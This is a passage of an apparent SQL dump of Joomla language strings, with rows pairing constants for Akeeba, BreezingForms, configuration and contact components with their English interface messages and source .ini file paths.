FAILED.','/home/smthsmth/public_html/language/en-GB/en-GB.com_akeeba.ini'),(16,'COM_AKEEBA_EMAIL_POSTPROCESSING_SUCCESS','Post-processing (upload to remote storage) was successful.','/home/smthsmth/public_html/language/en-GB/en-GB.com_akeeba.ini'),(17,'COM_BREEZINGFORMS_FORMS_DOUBLE_OPT_EMAIL_THANK_YOU','Thank you for verifying your submission! If you want to opt-out, please use the link in our verification email or contact us.','/home/smthsmth/public_html/language/en-GB/en-GB.com_breezingforms.ini'),(18,'COM_BREEZINGFORMS_FORMS_DOUBLE_OPT_OUT_EMAIL_THANK_YOU','Thank you for opting out. You can re-verify your submission at any time by clicking the link in our verification email.','/home/smthsmth/public_html/language/en-GB/en-GB.com_breezingforms.ini'),(19,'COM_BREEZINGFORMS_FORMS_DOUBLE_OPT_EMAIL_SUBJECT','Please verify your submission','/home/smthsmth/public_html/language/en-GB/en-GB.com_breezingforms.ini'),(20,'COM_BREEZINGFORMS_FORMS_DOUBLE_OPT_VERIFY_HERE','Confirm','/home/smthsmth/public_html/language/en-GB/en-GB.com_breezingforms.ini'),(21,'COM_BREEZINGFORMS_FORMS_DOUBLE_OPT_UNVERIFY_HERE','Cancel','/home/smthsmth/public_html/language/en-GB/en-GB.com_breezingforms.ini'),(22,'COM_BREEZINGFORMS_FORMS_DOUBLE_OPT_EMAIL_TEXT','Thank you for your submission! In order to verify your submission, please click on the link below:<br/><br/>','/home/smthsmth/public_html/language/en-GB/en-GB.com_breezingforms.ini'),(23,'COM_BREEZINGFORMS_FORMS_DOUBLE_OPT_OUT_EMAIL_TEXT','<br/><br/>You can remove your verification at any time by clicking this link:<br/><br/>','/home/smthsmth/public_html/language/en-GB/en-GB.com_breezingforms.ini'),(24,'COM_BREEZINGFORMS_FORMS_DOUBLE_OPT_EMAIL_TEXT_FOOTER','<br/><br/>Your Website Team!','/home/smthsmth/public_html/language/en-GB/en-GB.com_breezingforms.ini'),(25,'COM_BREEZINGFORMS_SIGNATURE_RESET_BUTTON','Reset','/home/smthsmth/public_html/language/en-GB/en-GB.com_breezingforms.ini'),(26,'COM_BREEZINGFORMS_STRIPE_DECLINED','Your payment has been declined.','/home/smthsmth/public_html/language/en-GB/en-GB.com_breezingforms.ini'),(27,'COM_BREEZINGFORMS_PAYMENT_METHOD_STRIPE','Credit Card Payment','/home/smthsmth/public_html/language/en-GB/en-GB.com_breezingforms.ini'),(28,'COM_BREEZINGFORMS_COULD_NOT_FIND_STRIPE_DATA','Could not find payment data','/home/smthsmth/public_html/language/en-GB/en-GB.com_breezingforms.ini'),(29,'COM_BREEZINGFORMS_COULD_NOT_FIND_STRIPE_AMOUNT','No amount given','/home/smthsmth/public_html/language/en-GB/en-GB.com_breezingforms.ini'),(30,'COM_BREEZINGFORMS_THANK_YOU_FOR_PAYING_WITH_STRIPE','Thank you for paying with credit card!','/home/smthsmth/public_html/language/en-GB/en-GB.com_breezingforms.ini'),(31,'COM_BREEZINGFORMS_OK','OK','/home/smthsmth/public_html/language/en-GB/en-GB.com_breezingforms.ini'),(32,'COM_BREEZINGFORMS_RC_REFRESH','Refresh','/home/smthsmth/public_html/language/en-GB/en-GB.com_breezingforms.ini'),(33,'COM_BREEZINGFORMS_RC_AUDIO','Audio','/home/smthsmth/public_html/language/en-GB/en-GB.com_breezingforms.ini'),(34,'COM_BREEZINGFORMS_RC_PICTURE','Picture','/home/smthsmth/public_html/language/en-GB/en-GB.com_breezingforms.ini'),(35,'COM_BREEZINGFORMS_RC_HELP','Help','/home/smthsmth/public_html/language/en-GB/en-GB.com_breezingforms.ini'),(36,'COM_BREEZINGFORMS_TRANSACTION_CANCELLED','Transaction cancelled by user!','/home/smthsmth/public_html/language/en-GB/en-GB.com_breezingforms.ini'),(37,'COM_BREEZINGFORMS_MOBILE_VERSION','Mobile Version','/home/smthsmth/public_html/language/en-GB/en-GB.com_breezingforms.ini'),(38,'COM_BREEZINGFORMS_DESKTOP','Desktop','/home/smthsmth/public_html/language/en-GB/en-GB.com_breezingforms.ini'),(39,'COM_BREEZINGFORMS_CAPTCHA_ENTRY_FAILED','Captcha entry failed!','/home/smthsmth/public_html/language/en-GB/en-GB.com_breezingforms.ini'),(40,'COM_BREEZINGFORMS_FILE_EXTENSION_NOT_ALLOWED','File extension not allowed!','/home/smthsmth/public_html/language/en-GB/en-GB.com_breezingforms.ini'),(41,'COM_BREEZINGFORMS_ID','ID','/home/smthsmth/public_html/language/en-GB/en-GB.com_breezingforms.ini'),(42,'COM_BREEZINGFORMS_IP','IP','/home/smthsmth/public_html/language/en-GB/en-GB.com_breezingforms.ini'),(43,'COM_BREEZINGFORMS_BROWSER','Browser','/home/smthsmth/public_html/language/en-GB/en-GB.com_breezingforms.ini'),(44,'COM_BREEZINGFORMS_DATA','Data','/home/smthsmth/public_html/language/en-GB/en-GB.com_breezingforms.ini'),(45,'COM_BREEZINGFORMS_FORM_DOES_NOT_EXIST','Form does not exist!','/home/smthsmth/public_html/language/en-GB/en-GB.com_breezingforms.ini'),(46,'COM_BREEZINGFORMS_COULD_NOT_FIND_PAYPAL_DATA','Could not find PayPal data!','/home/smthsmth/public_html/language/en-GB/en-GB.com_breezingforms.ini'),(47,'COM_BREEZINGFORMS_THANK_YOU_FOR_PAYING_WITH_PAYPAL','Thank you for paying with PayPal!','/home/smthsmth/public_html/language/en-GB/en-GB.com_breezingforms.ini'),(48,'COM_BREEZINGFORMS_COULD_NOT_FIND_DOWNLOAD_FILE','Could not find download file!','/home/smthsmth/public_html/language/en-GB/en-GB.com_breezingforms.ini'),(49,'COM_BREEZINGFORMS_MAX_DOWNLOAD_TRIES_REACHED','You reached the maximum amount of download tries!','/home/smthsmth/public_html/language/en-GB/en-GB.com_breezingforms.ini'),(50,'COM_BREEZINGFORMS_DOWNLOAD_NOT_POSSIBLE','Download not possible, did you reload the page? Please contact the site administrator or the site support!','/home/smthsmth/public_html/language/en-GB/en-GB.com_breezingforms.ini'),(51,'COM_BREEZINGFORMS_NO_DOWNLOADABLE_PRODUCT','This is no downloadable product!','/home/smthsmth/public_html/language/en-GB/en-GB.com_breezingforms.ini'),(52,'COM_BREEZINGFORMS_PLEASE_WAIT_REQUEST','Please wait while we process your request...','/home/smthsmth/public_html/language/en-GB/en-GB.com_breezingforms.ini'),(53,'COM_BREEZINGFORMS_COULD_NOT_FIND_SU_DATA','Could not find Sofortuebweisung data!','/home/smthsmth/public_html/language/en-GB/en-GB.com_breezingforms.ini'),(54,'COM_BREEZINGFORMS_THANK_YOU_FOR_PAYING_WITH_SU','Thank you for paying with sofortüberweisung.de!','/home/smthsmth/public_html/language/en-GB/en-GB.com_breezingforms.ini'),(55,'COM_BREEZINGFORMS_MISSING_PAYMENT_INFORMATION','Missing payment information. Not enough form information given.','/home/smthsmth/public_html/language/en-GB/en-GB.com_breezingforms.ini'),(56,'COM_BREEZINGFORMS_NOT_AVAILABLE','Not available','/home/smthsmth/public_html/language/en-GB/en-GB.com_breezingforms.ini'),(57,'COM_BREEZINGFORMS_YOUR_PAYMENT_AT_SU','Your payment at sofortueberweisung.de','/home/smthsmth/public_html/language/en-GB/en-GB.com_breezingforms.ini'),(58,'COM_BREEZINGFORMS_HALLO','Hallo,','/home/smthsmth/public_html/language/en-GB/en-GB.com_breezingforms.ini'),(59,'COM_BREEZINGFORMS_YOUR_PAYMENT_SUCCEEDED','your payment succeeded, please see your payment details below.','/home/smthsmth/public_html/language/en-GB/en-GB.com_breezingforms.ini'),(60,'COM_BREEZINGFORMS_REASON1','Reason 1','/home/smthsmth/public_html/language/en-GB/en-GB.com_breezingforms.ini'),(61,'COM_BREEZINGFORMS_REASON2','Reason 2','/home/smthsmth/public_html/language/en-GB/en-GB.com_breezingforms.ini'),(62,'COM_BREEZINGFORMS_AMOUNT','Amount','/home/smthsmth/public_html/language/en-GB/en-GB.com_breezingforms.ini'),(63,'COM_BREEZINGFORMS_TRANSACTION','Transaction','/home/smthsmth/public_html/language/en-GB/en-GB.com_breezingforms.ini'),(64,'COM_BREEZINGFORMS_ACCOUNT_HOLDER','Account holder','/home/smthsmth/public_html/language/en-GB/en-GB.com_breezingforms.ini'),(65,'COM_BREEZINGFORMS_ACCOUNT_NUMBER','Account number','/home/smthsmth/public_html/language/en-GB/en-GB.com_breezingforms.ini'),(66,'COM_BREEZINGFORMS_BANK_CODE','Bank code','/home/smthsmth/public_html/language/en-GB/en-GB.com_breezingforms.ini'),(67,'COM_BREEZINGFORMS_BANK_NAME','Bank name','/home/smthsmth/public_html/language/en-GB/en-GB.com_breezingforms.ini'),(68,'COM_BREEZINGFORMS_BIC','BIC','/home/smthsmth/public_html/language/en-GB/en-GB.com_breezingforms.ini'),(69,'COM_BREEZINGFORMS_IBAN','IBAN','/home/smthsmth/public_html/language/en-GB/en-GB.com_breezingforms.ini'),(70,'COM_BREEZINGFORMS_PAYMENT_DATE','Payment date','/home/smthsmth/public_html/language/en-GB/en-GB.com_breezingforms.ini'),(71,'COM_BREEZINGFORMS_RECEIPT_FOR_YOUR_PAYMENT','Recipient for your payment.','/home/smthsmth/public_html/language/en-GB/en-GB.com_breezingforms.ini'),(72,'COM_BREEZINGFORMS_PAYMENT_GATEWAY_SU','Payment gateway: sofortueberweisung.de','/home/smthsmth/public_html/language/en-GB/en-GB.com_breezingforms.ini'),(73,'COM_BREEZINGFORMS_COULD_NOT_FIND_PAYMENT_DATA','Could not find payment data!','/home/smthsmth/public_html/language/en-GB/en-GB.com_breezingforms.ini'),(74,'COM_BREEZINGFORMS_THANK_YOU_FOR_BUYING','Thank you for buying! Please download your file from the link below.','/home/smthsmth/public_html/language/en-GB/en-GB.com_breezingforms.ini'),(75,'COM_BREEZINGFORMS_YOUR_TRANSACTION_ID','Your transaction id','/home/smthsmth/public_html/language/en-GB/en-GB.com_breezingforms.ini'),(76,'COM_BREEZINGFORMS_PAYMENT_METHOD_PAYPAL','Payment method: PayPal','/home/smthsmth/public_html/language/en-GB/en-GB.com_breezingforms.ini'),(77,'COM_BREEZINGFORMS_DOWNLOAD','Download','/home/smthsmth/public_html/language/en-GB/en-GB.com_breezingforms.ini'),(78,'COM_BREEZINGFORMS_ALLOWED_TRIES','Allowed tries','/home/smthsmth/public_html/language/en-GB/en-GB.com_breezingforms.ini'),(79,'COM_BREEZINGFORMS_PAYMENT_ERROR_MSG','An error occured, see the message below. If you think this is a mistake then contact the site administrator and provide him with your transaction id and the message below, please. Thank you!','/home/smthsmth/public_html/language/en-GB/en-GB.com_breezingforms.ini'),(80,'COM_BREEZINGFORMS_ERROR','Error','/home/smthsmth/public_html/language/en-GB/en-GB.com_breezingforms.ini'),(81,'COM_BREEZINGFORMS_PAYMENT_METHOD_SU','Payment method: Sofortüberweisung','/home/smthsmth/public_html/language/en-GB/en-GB.com_breezingforms.ini'),(82,'COM_BREEZINGFORMS_YOUR_PAYMENT_REQUIRES_CONFIRMATION','Your payment requires confirmation, please wait until the download link appears...','/home/smthsmth/public_html/language/en-GB/en-GB.com_breezingforms.ini'),(83,'COM_BREEZINGFORMS_THANK_YOU_FOR_BUYING_SU','Thank you for buying! You will soon receive an email with further informationon on your order!','/home/smthsmth/public_html/language/en-GB/en-GB.com_breezingforms.ini'),(84,'COM_BREEZINGFORMS_SUBMIT_MESSAGE','Files submitted, sending form data now. Please do not abort!','/home/smthsmth/public_html/language/en-GB/en-GB.com_breezingforms.ini'),(85,'COM_BREEZINGFORMS_FLASH_UPLOADER_TOO_LARGE','Too large, won\'t be uploaded!','/home/smthsmth/public_html/language/en-GB/en-GB.com_breezingforms.ini'),(86,'COM_BREEZINGFORMS_FLASH_UPLOADER_FILESIZE_ERROR','File is too large!','/home/smthsmth/public_html/language/en-GB/en-GB.com_breezingforms.ini'),(87,'COM_BREEZINGFORMS_CHOOSE_FILE','Please choose your file(s)','/home/smthsmth/public_html/language/en-GB/en-GB.com_breezingforms.ini'),(88,'COM_BREEZINGFORMS_CHARS_LEFT','chars left','/home/smthsmth/public_html/language/en-GB/en-GB.com_breezingforms.ini'),(89,'COM_BREEZINGFORMS_CAPTCHA_MISSING_WRONG','The captcha is missing or wrong!','/home/smthsmth/public_html/language/en-GB/en-GB.com_breezingforms.ini'),(90,'COM_BREEZINGFORMS_PROCESS_SUBMITTERID','User-ID','/home/smthsmth/public_html/language/en-GB/en-GB.com_breezingforms.ini'),(91,'COM_BREEZINGFORMS_PROCESS_SUBMITTERUSERNAME','Username','/home/smthsmth/public_html/language/en-GB/en-GB.com_breezingforms.ini'),(92,'COM_BREEZINGFORMS_PROCESS_SUBMITTERFULLNAME','User full name','/home/smthsmth/public_html/language/en-GB/en-GB.com_breezingforms.ini'),(93,'COM_BREEZINGFORMS_PROCESS_FORMRECRECEIVED','Form record received','/home/smthsmth/public_html/language/en-GB/en-GB.com_breezingforms.ini'),(94,'COM_BREEZINGFORMS_PROCESS_RECORDSAVEDID','Record saved to database with ID: ','/home/smthsmth/public_html/language/en-GB/en-GB.com_breezingforms.ini'),(95,'COM_BREEZINGFORMS_PROCESS_FORMID','Form ID','/home/smthsmth/public_html/language/en-GB/en-GB.com_breezingforms.ini'),(96,'COM_BREEZINGFORMS_PROCESS_FORMTITLE','Form title','/home/smthsmth/public_html/language/en-GB/en-GB.com_breezingforms.ini'),(97,'COM_BREEZINGFORMS_PROCESS_FORMNAME','Form name','/home/smthsmth/public_html/language/en-GB/en-GB.com_breezingforms.ini'),(98,'COM_BREEZINGFORMS_PROCESS_SUBMITTEDAT','Submitted at','/home/smthsmth/public_html/language/en-GB/en-GB.com_breezingforms.ini'),(99,'COM_BREEZINGFORMS_PROCESS_SUBMITTERIP','Submitter IP','/home/smthsmth/public_html/language/en-GB/en-GB.com_breezingforms.ini'),(100,'COM_BREEZINGFORMS_PROCESS_PROVIDER','Submitter provider','/home/smthsmth/public_html/language/en-GB/en-GB.com_breezingforms.ini'),(101,'COM_BREEZINGFORMS_PROCESS_BROWSER','Submitter browser','/home/smthsmth/public_html/language/en-GB/en-GB.com_breezingforms.ini'),(102,'COM_BREEZINGFORMS_PROCESS_OPSYS','Submitter operating system','/home/smthsmth/public_html/language/en-GB/en-GB.com_breezingforms.ini'),(103,'COM_BREEZINGFORMS_PROCESS_SUBMITSUCCESS','Form successfully submitted','/home/smthsmth/public_html/language/en-GB/en-GB.com_breezingforms.ini'),(104,'COM_BREEZINGFORMS_PROCESS_UNPUBLISHED','Form is unpublished','/home/smthsmth/public_html/language/en-GB/en-GB.com_breezingforms.ini'),(105,'COM_BREEZINGFORMS_PROCESS_SAVERECFAILED','Save record failed','/home/smthsmth/public_html/language/en-GB/en-GB.com_breezingforms.ini'),(106,'COM_BREEZINGFORMS_PROCESS_SAVESUBFAILED','Save subrecord failed','/home/smthsmth/public_html/language/en-GB/en-GB.com_breezingforms.ini'),(107,'COM_BREEZINGFORMS_PROCESS_UPLOADFAILED','File upload failed','/home/smthsmth/public_html/language/en-GB/en-GB.com_breezingforms.ini'),(108,'COM_BREEZINGFORMS_PROCESS_SENDMAILFAILED','Send mail failed','/home/smthsmth/public_html/language/en-GB/en-GB.com_breezingforms.ini'),(109,'COM_BREEZINGFORMS_PROCESS_ATTACHMTFAILED','Create attachment file failed','/home/smthsmth/public_html/language/en-GB/en-GB.com_breezingforms.ini'),(110,'COM_BREEZINGFORMS_PROCESS_FILENOTWRTBLE','File is not writable','/home/smthsmth/public_html/language/en-GB/en-GB.com_breezingforms.ini'),(111,'COM_BREEZINGFORMS_PROCESS_DIRNOTWRTBLE','Directory is not writable','/home/smthsmth/public_html/language/en-GB/en-GB.com_breezingforms.ini'),(112,'COM_BREEZINGFORMS_PROCESS_DIRNOTEXISTS','Directory does not exist','/home/smthsmth/public_html/language/en-GB/en-GB.com_breezingforms.ini'),(113,'COM_BREEZINGFORMS_PROCESS_FILEEXISTS','File with same name allready exists','/home/smthsmth/public_html/language/en-GB/en-GB.com_breezingforms.ini'),(114,'COM_BREEZINGFORMS_PROCESS_FILEMOVEFAILED','File could not be moved','/home/smthsmth/public_html/language/en-GB/en-GB.com_breezingforms.ini'),(115,'COM_BREEZINGFORMS_PROCESS_FILECHMODFAILED','Change file permissions failed (chmod)','/home/smthsmth/public_html/language/en-GB/en-GB.com_breezingforms.ini'),(116,'COM_BREEZINGFORMS_PROCESS_PAGESTART','Start','/home/smthsmth/public_html/language/en-GB/en-GB.com_breezingforms.ini'),(117,'COM_BREEZINGFORMS_PROCESS_PAGEPREV','Previous','/home/smthsmth/public_html/language/en-GB/en-GB.com_breezingforms.ini'),(118,'COM_BREEZINGFORMS_PROCESS_PAGENEXT','Next','/home/smthsmth/public_html/language/en-GB/en-GB.com_breezingforms.ini'),(119,'COM_BREEZINGFORMS_PROCESS_PAGEEND','End','/home/smthsmth/public_html/language/en-GB/en-GB.com_breezingforms.ini'),(120,'COM_BREEZINGFORMS_PROCESS_LINE','Line','/home/smthsmth/public_html/language/en-GB/en-GB.com_breezingforms.ini'),(121,'COM_BREEZINGFORMS_PROCESS_MSGLINE','From line','/home/smthsmth/public_html/language/en-GB/en-GB.com_breezingforms.ini'),(122,'COM_BREEZINGFORMS_PROCESS_MSGUNKNOWN','From unknown','/home/smthsmth/public_html/language/en-GB/en-GB.com_breezingforms.ini'),(123,'COM_BREEZINGFORMS_PROCESS_IN','in','/home/smthsmth/public_html/language/en-GB/en-GB.com_breezingforms.ini'),(124,'COM_BREEZINGFORMS_PROCESS_ENTER','Enter','/home/smthsmth/public_html/language/en-GB/en-GB.com_breezingforms.ini'),(125,'COM_BREEZINGFORMS_PROCESS_ATLINE','at line','/home/smthsmth/public_html/language/en-GB/en-GB.com_breezingforms.ini'),(126,'COM_BREEZINGFORMS_PROCESS_ARRAY','Array','/home/smthsmth/public_html/language/en-GB/en-GB.com_breezingforms.ini'),(127,'COM_BREEZINGFORMS_PROCESS_OBJECT','Object','/home/smthsmth/public_html/language/en-GB/en-GB.com_breezingforms.ini'),(128,'COM_BREEZINGFORMS_PROCESS_RESOURCE','Resource','/home/smthsmth/public_html/language/en-GB/en-GB.com_breezingforms.ini'),(129,'COM_BREEZINGFORMS_PROCESS_UNKNOWN','Unknown','/home/smthsmth/public_html/language/en-GB/en-GB.com_breezingforms.ini'),(130,'COM_BREEZINGFORMS_PROCESS_LEAVE','Leave','/home/smthsmth/public_html/language/en-GB/en-GB.com_breezingforms.ini'),(131,'COM_BREEZINGFORMS_PROCESS_WARNSTK','WARNING: _ff_traceExit() called at empty stack','/home/smthsmth/public_html/language/en-GB/en-GB.com_breezingforms.ini'),(132,'COM_BREEZINGFORMS_PROCESS_EXCAUGHT','EXCEPTION CAUGHT BY BREEZINGFORMS','/home/smthsmth/public_html/language/en-GB/en-GB.com_breezingforms.ini'),(133,'COM_BREEZINGFORMS_PROCESS_PHPLEVEL','PHP error level :','/home/smthsmth/public_html/language/en-GB/en-GB.com_breezingforms.ini'),(134,'COM_BREEZINGFORMS_PROCESS_PHPFILE','PHP filename :','/home/smthsmth/public_html/language/en-GB/en-GB.com_breezingforms.ini'),(135,'COM_BREEZINGFORMS_PROCESS_PHPLINE','PHP linenumber :','/home/smthsmth/public_html/language/en-GB/en-GB.com_breezingforms.ini'),(136,'COM_BREEZINGFORMS_PROCESS_LASTPOS','Last known pos :','/home/smthsmth/public_html/language/en-GB/en-GB.com_breezingforms.ini'),(137,'COM_BREEZINGFORMS_PROCESS_ERRMSG','Error message :','/home/smthsmth/public_html/language/en-GB/en-GB.com_breezingforms.ini'),(138,'COM_BREEZINGFORMS_PROCESS_PIECE','Piece','/home/smthsmth/public_html/language/en-GB/en-GB.com_breezingforms.ini'),(139,'COM_BREEZINGFORMS_PROCESS_QPIECEOF','Query of','/home/smthsmth/public_html/language/en-GB/en-GB.com_breezingforms.ini'),(140,'COM_BREEZINGFORMS_PROCESS_QTITLEOF','Title of','/home/smthsmth/public_html/language/en-GB/en-GB.com_breezingforms.ini'),(141,'COM_BREEZINGFORMS_PROCESS_QVALUEOF','Value of','/home/smthsmth/public_html/language/en-GB/en-GB.com_breezingforms.ini'),(142,'COM_BREEZINGFORMS_PROCESS_SCRIPT','Script','/home/smthsmth/public_html/language/en-GB/en-GB.com_breezingforms.ini'),(143,'COM_BREEZINGFORMS_PROCESS_BFPIECE','Before form piece','/home/smthsmth/public_html/language/en-GB/en-GB.com_breezingforms.ini'),(144,'COM_BREEZINGFORMS_PROCESS_BFPIECEC','Before form custom piece code','/home/smthsmth/public_html/language/en-GB/en-GB.com_breezingforms.ini'),(145,'COM_BREEZINGFORMS_PROCESS_AFPIECE','After form piece','/home/smthsmth/public_html/language/en-GB/en-GB.com_breezingforms.ini'),(146,'COM_BREEZINGFORMS_PROCESS_AFPIECEC','After form custom piece code','/home/smthsmth/public_html/language/en-GB/en-GB.com_breezingforms.ini'),(147,'COM_BREEZINGFORMS_PROCESS_BSPIECE','Begin submit piece','/home/smthsmth/public_html/language/en-GB/en-GB.com_breezingforms.ini'),(148,'COM_BREEZINGFORMS_PROCESS_BSPIECEC','Begin submit custom piece code','/home/smthsmth/public_html/language/en-GB/en-GB.com_breezingforms.ini'),(149,'COM_BREEZINGFORMS_PROCESS_ESPIECE','End submit piece','/home/smthsmth/public_html/language/en-GB/en-GB.com_breezingforms.ini'),(150,'COM_BREEZINGFORMS_PROCESS_ESPIECEC','End submit custom piece code','/home/smthsmth/public_html/language/en-GB/en-GB.com_breezingforms.ini'),(151,'COM_BREEZINGFORMS_XML_ELEMENT','XML element','/home/smthsmth/public_html/language/en-GB/en-GB.com_breezingforms.ini'),(152,'COM_BREEZINGFORMS_XML_ATLINE','at line','/home/smthsmth/public_html/language/en-GB/en-GB.com_breezingforms.ini'),(153,'COM_BREEZINGFORMS_XML_UNEXPELEM','Unexpected element','/home/smthsmth/public_html/language/en-GB/en-GB.com_breezingforms.ini'),(154,'COM_BREEZINGFORMS_XML_UNEXPATTR','Unexpected attribute','/home/smthsmth/public_html/language/en-GB/en-GB.com_breezingforms.ini'),(155,'COM_BREEZINGFORMS_XML_UNEXPDATA','Unxepected data','/home/smthsmth/public_html/language/en-GB/en-GB.com_breezingforms.ini'),(156,'COM_BREEZINGFORMS_XML_UNEXPCLOS','Unexpected closing tag','/home/smthsmth/public_html/language/en-GB/en-GB.com_breezingforms.ini'),(157,'COM_BREEZINGFORMS_XML_REFMISSED','Fatal error: package reference missed','/home/smthsmth/public_html/language/en-GB/en-GB.com_breezingforms.ini'),(158,'COM_BREEZINGFORMS_XML_MISSFNAME','Missing file name.','/home/smthsmth/public_html/language/en-GB/en-GB.com_breezingforms.ini'),(159,'COM_BREEZINGFORMS_XML_ERROPENF','Error opening file','/home/smthsmth/public_html/language/en-GB/en-GB.com_breezingforms.ini'),(160,'COM_CONFIG','Administrator Services','/home/smthsmth/public_html/language/en-GB/en-GB.com_config.ini'),(161,'COM_CONFIG_CONFIGURATION','Administrator Services Configuration','/home/smthsmth/public_html/language/en-GB/en-GB.com_config.ini'),(162,'COM_CONFIG_ERROR_CONTROLLER_NOT_FOUND','Controller Not found!','/home/smthsmth/public_html/language/en-GB/en-GB.com_config.ini'),(163,'COM_CONFIG_FIELD_DEFAULT_ACCESS_LEVEL_DESC','Select the default access level for new content, menu items and other items created on your site.','/home/smthsmth/public_html/language/en-GB/en-GB.com_config.ini'),(164,'COM_CONFIG_FIELD_DEFAULT_ACCESS_LEVEL_LABEL','Default Access Level','/home/smthsmth/public_html/language/en-GB/en-GB.com_config.ini'),(165,'COM_CONFIG_FIELD_DEFAULT_LIST_LIMIT_DESC','Sets the default length of lists in the Control Panel for all users.','/home/smthsmth/public_html/language/en-GB/en-GB.com_config.ini'),(166,'COM_CONFIG_FIELD_DEFAULT_LIST_LIMIT_LABEL','Default List Limit','/home/smthsmth/public_html/language/en-GB/en-GB.com_config.ini'),(167,'COM_CONFIG_FIELD_METADESC_DESC','Enter a description of the overall website that is to be used by search engines. Generally, a maximum of 20 words is best.','/home/smthsmth/public_html/language/en-GB/en-GB.com_config.ini'),(168,'COM_CONFIG_FIELD_METADESC_LABEL','Site Meta Description','/home/smthsmth/public_html/language/en-GB/en-GB.com_config.ini'),(169,'COM_CONFIG_FIELD_METAKEYS_DESC','Enter the keywords and phrases that best describe your website. Separate keywords and phrases with a comma.','/home/smthsmth/public_html/language/en-GB/en-GB.com_config.ini'),(170,'COM_CONFIG_FIELD_METAKEYS_LABEL','Site Meta Keywords','/home/smthsmth/public_html/language/en-GB/en-GB.com_config.ini'),(171,'COM_CONFIG_FIELD_SEF_URL_DESC','Select if the URLs are optimised for Search Engines.','/home/smthsmth/public_html/language/en-GB/en-GB.com_config.ini'),(172,'COM_CONFIG_FIELD_SEF_URL_LABEL','Search Engine Friendly URLs','/home/smthsmth/public_html/language/en-GB/en-GB.com_config.ini'),(173,'COM_CONFIG_FIELD_SITE_NAME_DESC','Enter the name of your website. This will be used in various locations (eg the Backend browser title bar and <em>Site Offline</em> pages).','/home/smthsmth/public_html/language/en-GB/en-GB.com_config.ini'),(174,'COM_CONFIG_FIELD_SITE_NAME_LABEL','Site Name','/home/smthsmth/public_html/language/en-GB/en-GB.com_config.ini'),(175,'COM_CONFIG_FIELD_VALUE_AFTER','After','/home/smthsmth/public_html/language/en-GB/en-GB.com_config.ini'),(176,'COM_CONFIG_FIELD_VALUE_BEFORE','Before','/home/smthsmth/public_html/language/en-GB/en-GB.com_config.ini'),(177,'COM_CONFIG_FIELD_SITE_OFFLINE_DESC','Select if access to the Site Frontend is available. If Yes, the Frontend will display a message if set such in Backend.','/home/smthsmth/public_html/language/en-GB/en-GB.com_config.ini'),(178,'COM_CONFIG_FIELD_SITE_OFFLINE_LABEL','Site Offline','/home/smthsmth/public_html/language/en-GB/en-GB.com_config.ini'),(179,'COM_CONFIG_FIELD_SITENAME_PAGETITLES_DESC','Begin or end all Page Titles with the site name (for example, My Site Name - My Article Name).','/home/smthsmth/public_html/language/en-GB/en-GB.com_config.ini'),(180,'COM_CONFIG_FIELD_SITENAME_PAGETITLES_LABEL','Site Name in Page Titles','/home/smthsmth/public_html/language/en-GB/en-GB.com_config.ini'),(181,'COM_CONFIG_METADATA_SETTINGS','Metadata Settings','/home/smthsmth/public_html/language/en-GB/en-GB.com_config.ini'),(182,'COM_CONFIG_MODULES_MODULE_NAME','Module Name','/home/smthsmth/public_html/language/en-GB/en-GB.com_config.ini'),(183,'COM_CONFIG_MODULES_MODULE_TYPE','Module Type','/home/smthsmth/public_html/language/en-GB/en-GB.com_config.ini'),(184,'COM_CONFIG_MODULES_SETTINGS_TITLE','Module Settings','/home/smthsmth/public_html/language/en-GB/en-GB.com_config.ini'),(185,'COM_CONFIG_MODULES_SAVE_SUCCESS','Module saved.','/home/smthsmth/public_html/language/en-GB/en-GB.com_config.ini'),(186,'COM_CONFIG_SAVE_SUCCESS','Configuration saved.','/home/smthsmth/public_html/language/en-GB/en-GB.com_config.ini'),(187,'COM_CONFIG_SEO_SETTINGS','SEO Settings','/home/smthsmth/public_html/language/en-GB/en-GB.com_config.ini'),(188,'COM_CONFIG_SITE_SETTINGS','Site Settings','/home/smthsmth/public_html/language/en-GB/en-GB.com_config.ini'),(189,'COM_CONFIG_TEMPLATE_SETTINGS','Template Settings','/home/smthsmth/public_html/language/en-GB/en-GB.com_config.ini'),(190,'COM_CONFIG_XML_DESCRIPTION','Frontend Administrator Services Configuration Manager.','/home/smthsmth/public_html/language/en-GB/en-GB.com_config.ini'),(191,'COM_CONTACT_ADDRESS','Address','/home/smthsmth/public_html/language/en-GB/en-GB.com_contact.ini'),(192,'COM_CONTACT_ARTICLES_HEADING','Contact\'s articles','/home/smthsmth/public_html/language/en-GB/en-GB.com_contact.ini'),(193,'COM_CONTACT_CAPTCHA_LABEL','Captcha','/home/smthsmth/public_html/language/en-GB/en-GB.com_contact.ini'),(194,'COM_CONTACT_CAPTCHA_DESC','Please complete the security check.','/home/smthsmth/public_html/language/en-GB/en-GB.com_contact.ini'),(195,'COM_CONTACT_CAT_NUM','# of Contacts :','/home/smthsmth/public_html/language/en-GB/en-GB.com_contact.ini'),(196,'COM_CONTACT_CONTACT_DEFAULT_LABEL','Send an Email','/home/smthsmth/public_html/language/en-GB/en-GB.com_contact.ini'),(197,'COM_CONTACT_CONTACT_EMAIL_A_COPY_DESC','Sends a copy of the message to the address you have supplied.','/home/smthsmth/public_html/language/en-GB/en-GB.com_contact.ini'),(198,'COM_CONTACT_CONTACT_EMAIL_A_COPY_LABEL','Send a copy to yourself','/home/smthsmth/public_html/language/en-GB/en-GB.com_contact.ini'),(199,'COM_CONTACT_CONTACT_EMAIL_NAME_DESC','Your name.','/home/smthsmth/public_html/language/en-GB/en-GB.com_contact.ini'),(200,'COM_CONTACT_CONTACT_EMAIL_NAME_LABEL','Name','/home/smthsmth/public_html/language/en-GB/en-GB.com_contact.ini'),(201,'COM_CONTACT_CONTACT_ENTER_MESSAGE_DESC','Enter your message here.','/home/smthsmth/public_html/language/en-GB/en-GB.com_contact.ini'),(202,'COM_CONTACT_CONTACT_ENTER_MESSAGE_LABEL','Message','/home/smthsmth/public_html/language/en-GB/en-GB.com_contact.ini'),(203,'COM_CONTACT_CONTACT_ENTER_VALID_EMAIL','Please enter a valid email address.','/home/smthsmth/public_html/language/en-GB/en-GB.com_contact.ini'),(204,'COM_CONTACT_CONTACT_REQUIRED','<strong class=\"red\">*</strong> Required field','/home/smthsmth/public_html/language/en-GB/en-GB.com_contact.ini'),(205,'COM_CONTACT_CONTENT_TYPE_CONTACT','Contact','/home/smthsmth/public_html/language/en-GB/en-GB.com_contact.ini'),(206,'COM_CONTACT_CONTENT_TYPE_CATEGORY','Contact Category','/home/smthsmth/public_html/language/en-GB/en-GB.com_contact.ini'),(207,'COM_CONTACT_FILTER_LABEL','Filter 